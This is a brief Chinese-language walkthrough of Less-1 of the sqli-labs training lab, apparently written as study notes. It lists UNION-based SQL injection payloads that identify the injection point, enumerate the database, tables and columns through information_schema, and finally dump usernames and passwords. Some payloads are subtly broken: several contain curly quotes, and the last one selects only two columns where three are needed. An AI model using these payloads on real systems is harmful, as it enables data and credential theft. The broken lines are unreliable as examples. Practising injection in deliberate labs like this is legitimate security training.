1.按照http://localhost/sqli-labs/sqli-labs-master/Less-1/路径打开:
2.判断注入类型:(字符型)
Payload:?id=-1’ and 1=1--+
3.判断注入点:2,3
Payload:?id=-1’ union select 1,2,3--+
4.根据查出来的注入点查数据库名---security
Payload:?id=-1’ union select 1,database(),3--+
5.查询指定数据库下的所有表名
Payload:
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
6. 查询指定表名---users下的字段
Payload:
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
7.根据查到的字段名来爆出想查询的数据,例如username/password
Payload:
?id=-1' union select 1,group_concat(username,’=’,password) from security.users--+